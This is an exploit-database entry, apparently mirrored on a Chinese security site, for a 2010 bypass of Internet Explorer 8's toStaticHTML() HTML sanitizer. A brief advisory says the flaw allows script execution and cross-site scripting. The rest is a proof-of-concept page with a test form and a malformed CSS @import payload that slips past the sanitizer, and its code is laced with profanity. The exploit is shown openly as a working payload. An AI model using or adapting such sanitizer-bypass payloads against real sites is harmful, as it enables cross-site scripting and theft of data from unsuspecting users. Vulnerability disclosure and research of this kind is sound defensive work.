Microsoft Internet Explorer 8 – ‘toStaticHTML()’ HTML Sanitization Bypass - 体验盒子

作者： Mario Heiderich

日期： 2010-08-16

类别：

remote

平台：

windows

来源：https://www.exploit-db.com/exploits/34478/

source: https://www.securityfocus.com/bid/42467/info

Internet Explorer 8 is prone to a security-bypass weakness.

Internet Explorer 8 includes a method designed to sanitize executable script constructs from HTML. Attackers can bypass this protection, allowing script code to execute on the client, for example in a 'postMessage' call.

Attackers can leverage this issue to obtain sensitive information or potentially launch cross-site scripting attacks on unsuspecting users of targeted sites. Other attacks may also be possible. 

<script type="text/javascript">
function fuckie()
{
var szInput = document.shit.input.value;
var szStaticHTML = toStaticHTML(szInput);

ResultComment = szStaticHTML;
document.shit.output.value = ResultComment;
}
</script>

<form name="shit">
<textarea name=&#039;input&#039; cols=40 rows=20>
&lt;/textarea&gt;
<textarea name=&#039;output&#039; cols=40 rows=20>
&lt;/textarea&gt;

<input type=button value="fuck_me" name="fuck" onclick=fuckie();>
</form>


<style>

} () import <%7D () import> url(&#039;//127.0.0.1/1.css&#039;);aaa

{;}

</style>

<div id="x">Fuck Ie</div>